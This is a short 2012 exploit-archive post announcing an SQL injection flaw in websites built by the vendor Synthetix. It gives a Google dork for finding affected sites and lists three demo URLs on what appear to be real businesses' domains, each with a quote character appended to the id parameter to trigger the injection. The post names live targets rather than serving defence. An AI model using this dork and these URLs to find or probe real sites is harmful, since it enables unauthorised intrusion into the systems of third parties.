id: 18360
date: 05/26/2012
title: Synthetix - SQL Injection Vulnerability
author: D0m12
cves: 

==========================================================================
<<<:>>>          Synthetix - SQL Injection Vulnerability          <<:>>>
==========================================================================
Title:  Synthetix - SQL Injection Vulnerability
Author : D0m12
Date: 26/05/2012
Google Dork--> intext:"Website design & hosting by Synthetix" inurl:.php?id=
Vendor Link: http://www.synthetix.com/
Tested On: Win 7
Contact : d0m1265@yahoo.com
[+]Demos
http://www.marineroutboards.co.uk/news.php?id=9'
http://www.mercurymarine.co.uk/news.php?id=1'
http://www.johndeereengines.co.uk/news.php?id=2'

M0rE @ Google
Hope they fix their shit sOOn
Njoy!!!!!!

 #########################################################################
 Greetz To :
 All My Friends From ABH & to All those who know me:)
 #########################################################################



#  0day.today [2023-03-25]  #